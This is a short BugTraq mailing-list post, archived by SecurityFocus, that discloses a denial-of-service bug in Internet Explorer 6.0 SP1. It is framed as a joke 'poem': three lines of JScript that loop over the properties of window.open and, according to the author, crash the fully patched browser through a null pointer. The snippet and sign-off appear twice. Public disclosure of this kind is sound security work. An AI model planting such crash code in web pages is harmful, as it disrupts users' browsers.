BugTraq
Back to list
|
Post reply
I small poem in JScript
Jul 11 2004 07:28AM
Berend-Jan Wever (skylined edup tudelft nl)
I just wrote a small poem in JScript:
<SCRIPT language="javascript">
MSIE = window.open; // for hackers to come in
for (every_bug_found in MSIE) { /* there are zillions more hiden */ }
</SCRIPT>
Ok, so it doen't rhyme... but it is another null-pointer exception DoS in MSIE 6.0sp1 (fully patched) ;)
Cheers,
SkyLined
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
<SCRIPT language="javascript">
MSIE = window.open; // for hackers to come in
for (every_bug_found in MSIE) { /* there are zillions more hiden */ }
</SCRIPT>
Ok, so it doen't rhyme... but it is another null-pointer exception DoS in MSIE 6.0sp1 (fully patched) ;)
Cheers,
SkyLined
[ reply ]